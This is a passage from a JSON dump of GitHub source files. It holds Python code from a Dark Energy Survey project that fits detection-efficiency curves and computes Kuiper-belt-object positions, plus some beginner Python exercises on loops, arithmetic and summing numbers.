"text": "\n\n\nsearch_title = ['The Grand National', 'Prince Philip', 'Pub', 'Line Of Duty', 'Gym']\n\nsearch_increase = [1950, 550, 160, 130, 90]\n\nsearch_title_and_increase = zip(search_title,search_increase)\n#search_title_and_increase = search_title + search_increase\n\nprint(list(search_title_and_increase))\n\n#print(search_title_and_increase)\n"
}
] | 7 |
sjhamil/detectioneff_Y1
|
https://github.com/sjhamil/detectioneff_Y1
|
cefe39e63f08c57fa97045be378f77c2f12c9a0b
|
5578b21a54d0c1899acfffb02119da0f048e5482
|
04a71a00431442d4a13824f27b208c187cb249da
|
refs/heads/master
| 2016-05-26T12:33:30.560129 | 2015-07-16T02:07:40 | 2015-07-16T02:07:40 | 39,165,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6014934778213501,
"alphanum_fraction": 0.6212549209594727,
"avg_line_length": 35.12171173095703,
"blob_id": "fed5eb008d409f5ea4a490fccb2401534469c336",
"content_id": "c368218d38f7ec9d4698bb0c6196358e931588ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10981,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 304,
"path": "/get_effs.py",
"repo_name": "sjhamil/detectioneff_Y1",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nfrom __future__ import division\nimport os.path\nimport sys\nimport easyaccess as ea\nimport numpy as np\nfrom numpy import tanh\nimport ephem\nimport string\nimport re\nimport csv\nfrom Tools.ccdBounds import *\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy.optimize import curve_fit\n\n\n#Standard function for connecting to DESDM via easyaccess\ndef db_connect(section=''):\n db = ea.connect(section=section)\n cursor=db.cursor()\n return cursor, db\n\n\n#Compute which chip an object is/would be seen on given object ra,dec and telecope ra,dec\ndef compute_chip(rockra, rockdec, expra, expdec):\n '''\n Given the ra and dec of a point and of the center of an exposure, find the CCD containing that point.\n Returns a pair of the CCD name and number.\n '''\n deltara = 180/np.pi*ephem.degrees(rockra-expra).znorm # compute difference in degrees (normalized between -180, +180)\n deltadec = 180/np.pi*ephem.degrees(rockdec-expdec).znorm # the 180/pi is because ephem.Angle objects are natively in radians\n ccdname = 'None'\n for k in ccdBounds:\n if deltara > ccdBounds[k][0] and deltara < ccdBounds[k][1] and deltadec > ccdBounds[k][2] and deltadec < ccdBounds[k][3]:\n ccdname = k\n return ccdname, ccdNum[ccdname], deltara, deltadec\n\n\n\n#Check whether data needs to be fetched from the DB\ndef check_files(in_filename):\n in_filename_ext = in_filename.split('.')[-1]\n\n if in_filename_ext=='csv':\n if not os.path.exists(in_filename):\n print \"\\nFile \"+in_filename+\" does not exist!\"\n sys.exit(0)\n else:\n out_filename = in_filename\n print \"\\nUsing file \"+in_filename+\" for data\\n\"\n elif in_filename_ext=='sql':\n out_filename = 'query_output/'+re.split('[/.]',in_filename)[1]+'.csv'\n if not os.path.exists(out_filename):\n print \"\\n\"+out_filename+\" does not exist, fetching data\"\n fetch_data(in_filename, out_filename)\n elif os.path.getctime(in_filename)>os.path.getctime(out_filename):\n #print \"Embed input SQL newer than output csv, really fetch data?\"\n to_fetch_data = raw_input(\"\\n\"+in_filename+\" newer than \"+out_filename+\", fetch data? y/n: \")\n if to_fetch_data=='y':\n fetch_data(in_filename, out_filename)\n else:\n print \"Using file \"+out_filename+\" for data\\n\"\n else:\n print \"\\nUsing file \"+out_filename+\" for data\"\n\n return out_filename\n\n\n#Connect to database, load and execute query from SQL file, save data to csv file\ndef fetch_data(infile='', outfile=''):\n #Check provided file exists\n if not os.path.exists(infile):\n print (\"File '\"+infile+\"'does not exist!\")\n sys.exit(0)\n \n cursor, connection = db_connect('desoper')\n\n #Execute query for embedded data\n query = connection.loadsql(infile)\n print \"\\nExecuting the following query: '\"+query+\"'\\n\"\n connection.query_and_save(query, outfile)\n\n\n#Parse data file, returns dictonary whose keys are the exposure numbers and values are a list of each object and its properties associated with that expnum\ndef parse_data(data_file=''):\n if not os.path.exists(data_file):\n print \"File '\"+data_file+\"' does not exist!\"\n sys.exit(0)\n\n data_by_exp = defaultdict(list) #Dict whose keys are the expnums, values are list of dictionaries with info about each object from that expnum\n cnt_fakesperccd = defaultdict(lambda: defaultdict(int)) #Dict of form { expnum:{1:## 2:## ...} ... } where ## = fakes on that CCD\n\n with open(data_file) as csvfile:\n reader = csv.DictReader(csvfile,delimiter=',')\n for row in reader:\n data_by_exp[row['EXPNUM']].append(row)\n cnt_fakesperccd[row['EXPNUM']][int(row['CCDNUM'])] += 1\n\n exp_list = data_by_exp.keys()\n exp_list.sort()\n \n return exp_list, data_by_exp, cnt_fakesperccd\n\n\n#Write data to file, assumes input is a simple dictionary, also takes list of columns headers and outfile name as input\ndef write_curvefit(data_dict, header_list, outfile_name=''):\n with open(outfile_name, 'wb') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(header_list)\n\n for k,v in data_dict.iteritems():\n writer.writerow([k]+v)\n\n\n#Function used to fit the efficiency curves\n#Using a single tanh function\ndef fit_func(x,eff_max,mag50,width):\n return 0.5*eff_max*(1-tanh((x-mag50)/width))\n\n\n#Using a double tanh function\ndef fit_func2(x,eff_max,mag25,width1,width2):\n return 0.25*eff_max*(1-tanh((x-mag25)/width1))*(1-tanh((x-mag25)/width2))\n\n\n#Given the axis object, x data points, y data points, fit a curve to the data\n#Using fit_func -> single tanh\ndef fit_data(axis, x_data, y_data):\n param, cov_matrix = curve_fit(fit_func,x_data,y_data,p0=(1.0,23.0,0.6))\n \n p1 = param[0]\n p2 = param[1]\n p3 = param[2]\n residuals = y_data - fit_func(x_data,p1,p2,p3)\n chi_sq = sum(residuals**2)\n\n xaxis = np.linspace(19.5,28.0,150)\n fit_curve = fit_func(xaxis,p1,p2,p3)\n\n axis.plot(xaxis,fit_curve,'-')\n axis.text(26,1.5,'$\\chi^2$ = '+str(chi_sq))\n \n return axis, param, chi_sq\n \n#Using fit_func2 -> double tanh\ndef fit_data2(axis, x_data, y_data):\n param, cov_matrix = curve_fit(fit_func2,x_data,y_data,p0=(1.0,23.0,0.6,0.6))\n \n p1 = param[0]\n p2 = param[1]\n p3 = param[2]\n p4 = param[3]\n residuals = y_data - fit_func2(x_data,p1,p2,p3,p4)\n chi_sq = sum(residuals**2)\n\n xaxis = np.linspace(19.5,28.0,150)\n fit_curve = fit_func2(xaxis,p1,p2,p3,p4)\n\n axis.plot(xaxis,fit_curve,'-')\n axis.text(26,1.5,'$\\chi^2$ = '+str(chi_sq))\n\n return axis, param, chi_sq\n \n\n\ndef main():\n '''Usage: python get_data.py <embedfile_base> <foundfile_base> optional:<curvefit_type>'''\n\n\n #Parse command line arguments. Fetch data if needed and parse data csv file\n embed_infile = sys.argv[1]\n embed_outfile = check_files(embed_infile)\n exp_list, embed_by_expnum, embed_fakesperccd = parse_data(embed_outfile)\n \n found_infile = sys.argv[2]\n found_outfile = check_files(found_infile)\n useless, found_by_expnum, found_fakesperccd = parse_data(found_outfile)\n\n\n #If no argument given for the type of curve to fit, set to sing_tanh\n try:\n curvefit_type=sys.argv[3]\n except IndexError:\n curvefit_type='sing_tanh'\n \n if (curvefit_type!='sing_tanh' and curvefit_type!='doub_tanh'):\n print \"Please enter either 'sing_tanh' or 'doub_tanh' for the type of function to be fit to the efficiency curves!\"\n sys.exit(0)\n\n #Set paths for output files\n #PDF for efficiency curves\n eff_plots_file = 'plots/efficiencies_Y2_X2_iband_'+curvefit_type+'.pdf'\n eff_plots = PdfPages(eff_plots_file)\n \n #CSV file path and header list for efficiency curve fit parameters\n curvefit_params_file = 'curvefit_params_Y2_X2_iband_'+curvefit_type+'.csv'\n if curvefit_type=='sing_tanh':\n headers = ['EXPNUM','NITE','BAND','EFF_MAX','MAG50','WIDTH']\n if curvefit_type=='doub_tanh':\n headers = ['EXPNUM','NITE','BAND','EFF_MAX','MAG25','WIDTH1','WIDTH2'] \n\n curvefit_params = defaultdict(list) \n \n\n bad_exposures = []\n \n for exp in exp_list:\n #Set up plots\n #Plot for detection effciency curves\n fig1 = plt.figure()\n ax1=fig1.add_subplot(211)\n ax1.grid(b=True, which='major', color='k', linestyle=':')\n ax1.set_xlim(19.5,29)\n ax1.set_ylim(-0.5,2.0)\n ax1.set_xlabel('Magnitude')\n ax1.set_ylabel('Efficiency')\n ax1.set_title('Exposure #'+exp+', '+embed_by_expnum[exp][0]['BAND']+' band, Night of '+embed_by_expnum[exp][0]['NITE'])\n\n #Plot for fakes embedded/found per CCD\n ax2=fig1.add_subplot(212)\n ax2.grid(True)\n ax2.set_xlim(-1,64)\n ax2.set_xlabel('CCDNUM')\n ax2.set_ylabel('Count')\n\n \n eff_list = []\n mag_list = []\n error_list = []\n\n mag = 20.0\n magstep = 0.25\n\n while mag<99.0:\n #Build list of objects in desired magnitude bin\n embed_tmp = [float(m['TRUEMAG']) for m in embed_by_expnum[exp] if mag<=float(m['TRUEMAG'])<mag+magstep]\n found_tmp = [float(m['TRUEMAG']) for m in found_by_expnum[exp] if mag<=float(m['TRUEMAG'])<mag+magstep]\n\n if len(embed_tmp)==0:\n break\n \n eff = len(found_tmp)/len(embed_tmp)\n error = np.sqrt((1/len(embed_tmp))**2*len(found_tmp) + (len(found_tmp)/(len(embed_tmp))**2)**2*len(embed_tmp)) \n \n eff_list.append(eff)\n mag_list.append(np.median(embed_tmp))\n error_list.append(error)\n \n mag+=magstep\n\n\n #Plot eff vs. mag\n ax1.plot(mag_list, eff_list, marker='+', linestyle='None')\n ax1.errorbar(mag_list, eff_list, xerr=0, yerr=error_list, linestyle='None')\n\n \n #Number of fit parameters. There must be at least this many data points\n if curvefit_type=='sing_tanh':\n nparams=3\n elif curvefit_type=='doub_tanh':\n nparams=4\n\n if len(eff_list)>nparams:\n try:\n if curvefit_type=='sing_tanh':\n ax1, fit_params_tup, fit_chisq = fit_data(ax1,mag_list,eff_list)\n elif curvefit_type=='doub_tanh':\n ax1, fit_params_tup, fit_chisq = fit_data2(ax1,mag_list,eff_list)\n fit_params = [tup for tup in fit_params_tup] #Convert numpy ndarray to list\n fit_params.append(fit_chisq) #List has form [eff_max, mag50, width, fit_chisq] or [eff_max, mag25, width1, width2, fit_chisq]\n #If there more than nparams data points but the data points cannot be fit\n except RuntimeError:\n print('Exposure '+exp+' encountered a RuntimeError')\n bad_exposures.append(exp)\n fit_params = [0]*nparams\n pass\n else:\n print('Exposure '+exp+' had '+str(nparams)+' or less data points')\n bad_exposures.append(exp)\n\n\n fit_params.insert(0,embed_by_expnum[exp][0]['BAND'])\n fit_params.insert(0,embed_by_expnum[exp][0]['NITE'])\n curvefit_params[exp]=fit_params\n\n #Plot fakes embedded and found per CCD\n ax2.scatter(embed_fakesperccd[exp].keys(), embed_fakesperccd[exp].values(), marker='+')\n ax2.scatter(found_fakesperccd[exp].keys(), found_fakesperccd[exp].values(), marker='o')\n\n eff_plots.savefig(orientation='portrait')\n \n eff_plots.close()\n print \"\\nPlots saved to: \"+eff_plots_file\n \n #Write curve fitting parameters to csv file\n write_curvefit(curvefit_params,headers,curvefit_params_file)\n print \"Curve fit data saved to: \"+curvefit_params_file\n\n \nif __name__=='__main__':\n main()\n"
},
{
"alpha_fraction": 0.6473610997200012,
"alphanum_fraction": 0.6599024534225464,
"avg_line_length": 40.29496383666992,
"blob_id": "0deeff8f76541cea05526905bb74a408506bc710",
"content_id": "255b51a04b13da757d87baa3c696c4737cfa6d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11482,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 278,
"path": "/Tools/KBO.py",
"repo_name": "sjhamil/detectioneff_Y1",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nimport ephem\nfrom itertools import count\n#from desdb import Connection\nfrom ephem import hours, degrees, Equatorial, Ecliptic\nfrom pyOrbfit.Orbit import Orbit\nfrom Catalog import Catalog, DateTime, TimeDelta, Point\nfrom DECamField import DECamField\nfrom DECamExposure import DECamExposure\nfrom ccdBounds import *\nfrom MPCRecord import MPCRecord\n\nsidereal_rate = ephem.degrees(2*np.pi/365.256363)\n\n# adding 4.944 hours puts the sun at exactly 180 degrees ecliptic longitude\nautumnal_equinox = DateTime(ephem.next_equinox('2014-07-24') + 4.944*ephem.hour)\n\nfields = Catalog('KBOTools/fields.csv', name=str, centerra=float, centerdec=float, opposition=float, visitspath=str, orderedby='name')\nfields.add_property('center', lambda pt: Equatorial(hours(pt.centerra), degrees(pt.centerdec)))\nfields.add_property('visits', lambda pt: Catalog(pt.visitspath, nite=int, date=float, dlon=float, dlat=float, vlon=float, vlat=float))\nfields.refactor('opposition', DateTime)\nfor field in fields: field.visits.refactor('date', DateTime)\n\ndef _exp_contains(self, ra1, dec1): return DECamField(self.ra, self.dec).contains(ra1, dec1)\ndef _exp_ellipse(self): return DECamField(self.ra, self.dec).ellipse()\n\nexposures = Catalog('exposures.csv', expnum=int, date=DateTime, ra=hours, dec=degrees, exptime=float, band=str, tag=str, object=str)\nexposures.add_function('contains', _exp_contains)\nexposures.add_function('ellipse', _exp_contains)\nexpquality = Catalog('exposure_quality.csv',expnum=int,date=DateTime,band=str,object=str,accepted=str,t_eff=float,fwhm_asec=float,ellipticity=float,skybrightness=float)\n\ndef get_nite(date):\n '''\n Get a \"nite number\" of the form yyyymmdd\n from a DateTime or pyEphem date object.\n '''\n stdate = str(date)\n year, month, daytime = stdate.split('/')\n day, time = daytime.split()\n hour = time.split(':')[0]\n month = month.zfill(2)\n day = day.zfill(2)\n nite = int(year + month + day)\n return nite if int(hour) >= 12 else nite - 1\n\nexposures_by_nite = exposures.groupby(lambda pt: get_nite(pt.date))\n\ndef good_visits(field):\n goodvisits = Catalog(nite=int,date=float,band=str,t_eff=float,fwhm_asec=float,ellipticity=float,skybrightness=float)\n for visit in field.visits:\n exps = [e for e in expquality if get_nite(e.date)==visit.nite and field.name in e.object]\n good = True\n for e in exps:\n if e.accepted == 'False': good = False\n\n \n\ndef snob_query(rock, date, rng):\n '''\n Return an SQL query string that looks for SN difference imaging objects near the predicted position of rock on the specified date.\n \n rock should be a pyEphem Orbit object.\n date should be a DateTime, pyEphem date, or\n floating-point Julian Day.\n rng specifies the search range in both ra and dec,\n in (decimal) degrees.\n Fields returned are date_obs, ra, dec, expnum,\n exptime, band, ccdnum, mag, pixelx, pixely,\n snobjid, ml_real_bogus_score.\n '''\n pos = rock.predict_pos(date)\n ra, dec = pos['ra'] * 180/np.pi, pos['dec'] * 180/np.pi\n nite = get_nite(date)\n query = \"select e.date_obs, o.ra, o.dec, e.expnum, e.exptime, o.band, o.ccdnum, o.mag, o.pixelx, o.pixely, o.snobjid, \" \\\n \"o.ml_real_bogus_score from snobs_legacy o join exposure e on o.exposureid = e.expnum where e.nite = \" + \\\n str(nite) + \" and o.ra between \" + str(ra - rng) + \" and \" + str(ra + rng) + \" and o.dec between \" + \\\n str(dec - rng) + \" and \" + str(dec + rng) + \" order by e.date_obs\"\n return query\n\ndef object_query(rock, date, rng):\n '''\n Return an SQL query string that looks for wide survey objects near the predicted position of rock on the specified date.\n \n rock should be a pyEphem Orbit object.\n date should be a DateTime, pyEphem date, or\n floating-point Julian Day.\n rng specifies the search range in both ra and dec,\n in (decimal) degrees.\n Fields returned are date_obs, ra, dec, expnum,\n exptime, band, ccd, mag_psf, xwin_image, ywin_image,\n tag.\n '''\n pos = rock.predict_pos(date)\n ra, dec = pos['ra'] * 180/np.pi, pos['dec'] * 180/np.pi\n nite = get_nite(date)\n query = \"select e.date_obs, o.ra, o.dec, e.expnum, e.exptime, i.band, i.ccd, o.mag_psf, o.xwin_image, o.ywin_image, t.tag from \" \\\n \"objects_current o, image i, exposure e, runtag t where i.exposureid = e.id and o.imageid = i.id and i.run = t.run and \" \\\n \"e.nite = \" + str(nite) + \" and o.ra between \" + str(ra - rng) + \" and \" + str(ra + rng) + \" and o.dec between \" + \\\n str(dec - rng) + \" and \" + str(dec + rng) + \" order by e.date_obs\"\n return query\n\ndef field_query(field, band='i'):\n '''\n Return an SQL query string that looks for the nights when a given field was visited.\n \n This looks for i-band exposures by default.\n Fields returned are nite, date_obs, expnum, object.\n '''\n query = \"select distinct e.nite, e.date_obs, e.expnum, e.object from exposure e where e.object like 'DES supernova hex SN-\" + \\\n field + \"%' and e.band='\" + band + \"' order by e.date_obs\"\n return query\n\ndef anomalies(field, date):\n '''\n Calculate the shifts in ecliptic coordinates expected for a stationary object in the specified field on the specified date.\n \n date should be a DateTime object, pyEphem\n date, floating-point JD, or compatible string.\n Results are returned as a pair (dlon, dlat),\n in arbitrary units. To get appropriately scaled\n results, multiply by the reciprocal of the object's\n distance from the sun in AU.\n '''\n field = fields[field]\n date = DateTime(date)\n omegat = sidereal_rate * (date - field.opposition)\n lat = Ecliptic(field.center).lat\n dlon = -np.sin(omegat)/np.cos(lat)\n dlat = np.cos(omegat)*np.sin(lat)\n return dlon, dlat\n\ndef velocities(field, date):\n '''\n Calculate the expected rates of change of ecliptic coordinates expected for a stationary object in the specified field on the specified date.\n \n date should be a DateTime object, pyEphem\n date, floating-point JD, or compatible string.\n Results are returned as a pair (vlon, vlat),\n in arbitrary units. To get appropriately scaled\n results, multiply by the sidereal rate and then\n by the reciprocal of the object's distance from\n the sun in AU.\n '''\n field = fields[field]\n date = DateTime(date)\n omegat = sidereal_rate * (date - field.opposition)\n lat = Ecliptic(field.center).lat\n vlon = -np.cos(omegat)/np.cos(lat)\n vlat = -np.sin(omegat)*np.sin(lat)\n return vlon, vlat\n\ndef toDateTime(ISOdate):\n '''\n Transform an ISO date string into a DateTime object.\n '''\n datestring = ' '.join(ISOdate.split('T'))\n return DateTime(datestring)\n\ndef pretty_nite(nite):\n '''\n Return a string in yyyy/mm/dd format from a\n \"nite number\" of the form yyyymmdd.\n '''\n nitestr = str(nite)\n nitestr = \"/\".join([nitestr[:4], nitestr[4:6], nitestr[6:]])\n return nitestr\n\ndef sexagesimal(ra, dec):\n '''\n Return the sexagesimal representation, as pyEphem\n objects, of the coordinates (ra, dec), which are\n taken to be in decimal degree format.\n '''\n return hours(float(ra) * np.pi/180), degrees(float(dec) * np.pi/180)\n\ndef decimal(ra, dec):\n '''\n Return the decimal degree representation of the\n coordinates (ra, dec), which are taken to be in\n radians (or pyEphem objects stored that way).\n '''\n return hours(ra) * 180/np.pi, degrees(dec) * 180/np.pi\n\ndef days_between(start, stop):\n '''\n Return a generator object that iterates over\n the days between start and stop as DateTime objects.\n '''\n startd, stopd = DateTime(start), DateTime(stop)\n d = startd\n while d < stopd:\n yield d\n d = DateTime(d + 1)\n\ndef compute_chip(rockra, rockdec, expra, expdec):\n '''\n Given the ra and dec of a point and of the center\n of an exposure, find the CCD containing that point.\n \n Returns a pair of the CCD name and number.\n '''\n deltara = 180/np.pi*ephem.degrees(rockra-expra).znorm # compute difference in degrees (normalized between -180, +180)\n deltadec = 180/np.pi*ephem.degrees(rockdec-expdec).znorm # the 180/pi is because ephem.Angle objects are natively in radians\n ccdname = 'None'\n for k in ccdBounds:\n if deltara > ccdBounds[k][0] and deltara < ccdBounds[k][1] and deltadec > ccdBounds[k][2] and deltadec < ccdBounds[k][3]:\n ccdname = k\n return ccdname, ccdNum[ccdname]\n\ndef find_exposures(target_ra, target_dec):\n '''\n Find exposures containing a given (ra, dec).\n \n Returns a list of dictionaries with keys 'expnum', 'ccd', 'date', 'band'\n expnum is the exposure number\n ccd is the (integer) chip id\n date is the date as a DateTime object\n band is the band (g,r,i,z).\n '''\n match = []\n for exp in exposures:\n if exp.contains(target_ra, target_dec):\n ccdname, ccdnum = compute_chip(target_ra, target_dec, exp.ra, exp.dec)\n this_match = {'expnum': exp.expnum, 'ccd': ccdnum, 'date': exp.date, 'band': exp.band}\n if ccdnum != -99: match.append(this_match)\n return match\n\ndef find_exposures_by_nite(nite, target_ra, target_dec, snfields = True):\n '''\n Find exposures on a given night containing a given (ra, dec).\n \n Returns a list of dictionaries with keys 'expnum', 'ccd', 'date', 'band'\n expnum is the exposure number\n ccd is the (integer) chip id\n date is the date as a DateTime object\n band is the band (g,r,i,z).\n '''\n match = []\n for exp in exposures_by_nite[nite]:\n if exp.contains(target_ra, target_dec) and (snfields or not exp.object.startswith('DES supernova hex')):\n ccdname, ccdnum = compute_chip(target_ra, target_dec, exp.ra, exp.dec)\n this_match = {'expnum': exp.expnum, 'ccd': ccdnum, 'date': exp.date, 'band': exp.band}\n if ccdnum != -99: match.append(this_match)\n return match\n\ndef count(start = 0):\n i = start\n while True:\n i += 1\n yield i\n \n \n #def __init__(self, obsnum=' ', MPprovisional=' ', discovery=' ', note1=' ', \n # note2='C', obsdate=ephem.date('2000/01/01'), ra_obs_J2000=ephem.hours(0), dec_obs_J2000=ephem.degrees(0), \n # mag=99, band='r', observatoryCode='W84', newobject=True): \ndef MPCobservation(point, temp_designation=' ', packed_designation=' '):\n newobject=False\n if packed_designation==' ': newobject=True\n if newobject==False and packed_designation==' ':\n print 'MPCobservation Error, must supply packed designation'\n rec = MPCRecord(obsnum=packed_designation, MPprovisional=temp_designation, obsdate=ephem.date(point.date+point.exptime*ephem.second/2), ra_obs_J2000=point.ra, dec_obs_J2000=point.dec,\n mag=point.mag, band=point.band, newobject=newobject)\n return rec.record\n\ndef absolute_magnitude(orbit, apparent_mag, date_obs):\n # computes the absolute magnitude of an object, given its orbit and apparent magnitude on date_obs\n body = orbit.ellipticalBody()\n body.compute(date_obs)\n d_BS = body.sun_distance\n d_BE = body.earth_distance\n d_ES = 1.0\n cos_chi = (d_BE**2 + d_BS**2 - d_ES**2)/(2*d_BE*d_BS)\n chi = np.arccos(cos_chi)\n# P = (2/3)*((1-chi/np.pi)*np.cos(chi) + (1/np.pi)*np.sin(chi))\n P=1\n H = apparent_mag - 2.5*np.log10(d_BS**2*d_BE**2/(P*d_ES**4))\n return H\n\n\n"
}
] | 2 |
bamundagaaloyzius/pythonstart
|
https://github.com/bamundagaaloyzius/pythonstart
|
6f5abd69dc25de57de071146cfff908ede266e0d
|
2c35a818d6bd86e074c1b5cb6849518167efdf17
|
ad978fa026d8918814f6181a7721c3463961d5a4
|
refs/heads/master
| 2021-06-24T01:25:24.388956 | 2021-02-11T06:39:55 | 2021-02-11T06:39:55 | 193,876,022 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49056604504585266,
"alphanum_fraction": 0.5094339847564697,
"avg_line_length": 10.666666984558105,
"blob_id": "8bcbf13f2cb773826fbe1961d9c1b85d7e0e81ec",
"content_id": "28c51de70efb243400532d8d25e5c2013afcd9d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/loops.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "# seq= [\"hei\",\"too\"]\n\n# for item in seq:\n# \tprint(\"ally\")\n\n\ni=3\nwhile i<5:\n\tprint (\"i is: {}\".format(i))\n\t"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 9,
"blob_id": "88182ee463f00c27907098416f777aba6b30dce2",
"content_id": "9080dad591b6cd56016d4fa888d56ea3972f670e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 2,
"path": "/loops_2.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "if (i%2)=1\nprint(i) "
},
{
"alpha_fraction": 0.6098265647888184,
"alphanum_fraction": 0.6445086598396301,
"avg_line_length": 20.4375,
"blob_id": "31df39f95bf4ac3af7432040badba315f32247b5",
"content_id": "5d08c49399722b404ad1aff72daa061f1a071937",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 16,
"path": "/sum_of_two_numbers.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "\n\nnum_1 = input(\"type first number\")\nnum_2 = input(\"type second number\")\nresult = float(num_1) + float(num_2)\nprint(result)\n\n# num1 = input(\"type first number\")\n# num2 = input(\"type second number\")\n\n# def add_two_numbers(num1, num2):\n# \ttotal = float(num1) + float(num2)\n# \t# print(total)\n# \treturn total\n\n# x = add_two_numbers(3,5)\n\n# print(x)\n\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "9794b8e8e798d5b3a3128a8147cafb1b5acdcfc0",
"content_id": "af314dd77193560d3dfde8235d9cb1ab72603205",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "This is my first file\nThis is a test with nano editor\n"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 17.5,
"blob_id": "15efd3b85217d7e7949717c577e1791cde9cd519",
"content_id": "b7f43a683c58d37ac8fe326b01948827f28ca707",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/sum_of_N_numbers.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "N = int(input(\"how many numbers do u want to add\"))\n\nsum = 0\nfor i in range(N):\n\tsum = sum+int(input(\"Enter number:\\n\"))\n\n\nprint(\"The sum is \",sum)"
},
{
"alpha_fraction": 0.56886225938797,
"alphanum_fraction": 0.6047903895378113,
"avg_line_length": 10.571428298950195,
"blob_id": "6c69e671e23cb7009d50bf0331833402e309a044",
"content_id": "7441d9bc1beba33aea43f936889ebd363f4ca533",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 14,
"path": "/control_statements.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "\n#if else statements\nif 2==5:\n\tprint(\"fake\")\nelse:\n\tprint(\"playing with my head\")\n\nif 1==2:\n\tprint(\"hi\")\nelif 7==2:\n\tprint(\"sure\")\nelse:\n\tprint(\"true\")\n\n# comment\n\n\n\n\n"
},
{
"alpha_fraction": 0.5917159914970398,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 7.095238208770752,
"blob_id": "13d3d57d8383e1eed8dcb27f4764c4b58be937d4",
"content_id": "dbe6b6ab9967172d53b3d75d4ff32e15662cc328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 21,
"path": "/arithmetic.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "x=10.3\ny=4\n\n#addition\nz=x+y\nprint(\"z is \" + str(z))\n\n#multiplication\n\nw =x*y\nprint(\"w is \" + str(w ))\n\n#subtraction\n\nprint(y-x)\n\n#modulo\nprint(y%x)\n\n#division\nprint(x/y)"
}
] | 7 |
dcelik/SoftwareDesign
|
https://github.com/dcelik/SoftwareDesign
|
7b9939c947a0125fd446e0c10128f843134a6d5a
|
6397a4d3b60d23971159f11ce0ac5b006c35dd21
|
135cc16855ad83ed350c3e2c6c6be5751341f586
|
refs/heads/master
| 2021-01-18T02:01:34.171899 | 2014-04-10T17:50:50 | 2014-04-10T17:50:50 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4974619150161743,
"alphanum_fraction": 0.5702199935913086,
"avg_line_length": 25.909090042114258,
"blob_id": "3e7cd5be996fd86d98dc9a7535dcce4ab6cb3680",
"content_id": "98d61768a5d8485d0d43a75a145f5c73d754394a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 591,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 22,
"path": "/levenshtein.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 15:04:21 2014\n\n@author: dcelik\n\"\"\"\n\ndef levenshtein_distance(s1,s2,d={}):\n \"\"\" \n Computes the Levenshtein distance between two input strings \n \"\"\"\n if len(s1) == 0:\n return len(s2)\n if len(s2) == 0:\n return len(s1)\n elif (s1,s1) in d:\n return d[(s1,s2)]\n else:\n x = min([int(s1[0] != s2[0]) + levenshtein_distance(s1[1:],s2[1:]), 1+levenshtein_distance(s1[1:],s2), 1+levenshtein_distance(s1,s2[1:])])\n d[(s1,s2)]=x\n return x\nprint levenshtein_distance(\"denizecelik\",\"ryanlouie\")"
},
{
"alpha_fraction": 0.654549241065979,
"alphanum_fraction": 0.65932697057724,
"avg_line_length": 41.79111099243164,
"blob_id": "f5e771d6a36145eb7e473e33ba4dcc813df7d137",
"content_id": "b296841ef332c2c91664bc08afe9da06135eeb4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9628,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 225,
"path": "/hw3/gene_finder.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
